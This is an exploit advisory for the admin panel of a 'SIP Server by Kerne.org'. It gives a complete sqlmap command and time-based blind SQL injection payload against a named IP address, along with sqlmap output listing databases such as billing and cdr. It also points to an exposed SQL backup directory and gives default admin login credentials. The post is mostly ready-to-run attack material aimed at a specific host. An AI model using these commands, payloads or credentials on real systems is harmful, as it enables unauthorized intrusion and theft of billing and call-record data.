SIP Server by Kerne.org - Multiple Vulnerabilties =================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : Kerne.org #################################################################### [1] Time-Based Blind Injection [POST] ======================================== sqlmap.py -u "http://177.129.8.146/admin/index.php" --data="action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" -p "username" --level=5 --risk=5 --dbs sqlmap identified the following injection points with a total of 1751 HTTP(s) requests: --- Place: POST Parameter: username Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM --- web server operating system: Linux Ubuntu 12.04 (Precise Pangolin) web application technology: Apache 2.2.22, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: username Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM --- web server operating system: Linux Ubuntu 12.04 (Precise Pangolin) web application technology: Apache 2.2.22, PHP 5.3.10 back-end DBMS: MySQL 5 available databases [5]: [*] billing [*] cdr [*] information_schema [*] proftpd [*] test [2] Backup download ==================== Go To [http://177.129.8.146/admin/sql/] You Find Sql Files And Download [3] Default Data Admin Login: ============================== Username: Operations Password: k3cn18